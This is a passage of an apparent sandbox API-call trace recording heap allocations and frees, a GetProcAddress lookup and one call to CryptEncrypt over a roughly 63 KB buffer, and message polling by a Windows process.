0x2e78a50 [0128.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0128.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0128.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0128.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0128.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0128.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0128.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0128.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0128.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0128.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0128.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0128.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0128.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0128.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0128.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0128.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0128.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0128.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0128.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0128.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0128.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0128.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0128.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0128.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0128.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0128.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0128.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf8fc) returned 0x2ecee58 [0128.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0128.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ecee58 | out: hHeap=0x970000) returned 1 [0128.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0128.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0128.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0128.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0128.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0128.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0128.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0128.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0128.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0128.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0128.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0128.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0128.577] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0128.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0128.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0128.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0128.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0128.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0128.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0128.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0128.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0128.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0128.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0128.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0128.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0128.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0128.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0128.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0128.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0128.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0128.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0128.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0128.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0128.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0128.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0128.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0128.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0128.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0128.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0128.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0128.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0128.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0128.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0128.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0128.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0128.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0128.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0128.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0128.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0128.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0128.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0128.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0128.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0128.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0128.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0128.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0128.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0128.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0128.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0128.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0128.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0128.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0128.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0128.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0128.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0128.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0128.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50b48, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0128.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0128.580] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0128.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0128.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0128.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0128.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0128.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0128.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0128.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0128.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0128.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0128.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0128.580] CryptEncrypt (in: hKey=0xa86f90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xf8fc, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xf900) returned 1 [0128.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0128.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0128.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0128.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0128.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0128.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0128.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0128.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0128.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0128.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0128.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0128.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0128.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0128.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0128.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0128.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0128.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0128.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0128.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0128.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0128.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0128.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0128.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0128.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0128.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0128.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0128.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0128.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0128.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0128.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0128.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0128.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0128.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0128.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0128.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0128.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0128.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0128.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0128.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0128.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0128.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0128.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0128.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0128.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0128.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0128.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0128.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0128.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0128.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0128.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0128.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0128.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0128.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0128.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0128.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0128.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0128.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0128.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0128.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0128.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0128.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0128.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0128.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0128.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0128.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0128.612] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0128.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0128.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0128.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0128.612] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0128.612] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0128.612] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.613] CharLowerBuffW (in: lpsz="byte[63744]", cchLength=0xb | out: lpsz="byte[63744]") returned 0xb [0128.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0128.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0128.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0128.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0128.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0128.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0128.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0128.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0128.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0128.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0128.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf900) returned 0x2ecee58 [0128.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0128.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0128.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0128.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0128.616] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0128.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0128.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0128.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0128.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0128.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0128.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0128.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0128.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0128.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0128.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0128.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0128.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf8fc) returned 0x2ede760 [0128.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0128.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf8fc) returned 0x2eee068 [0128.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0128.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0128.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0128.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0128.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0128.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0128.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ede760 | out: hHeap=0x970000) returned 1 [0128.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 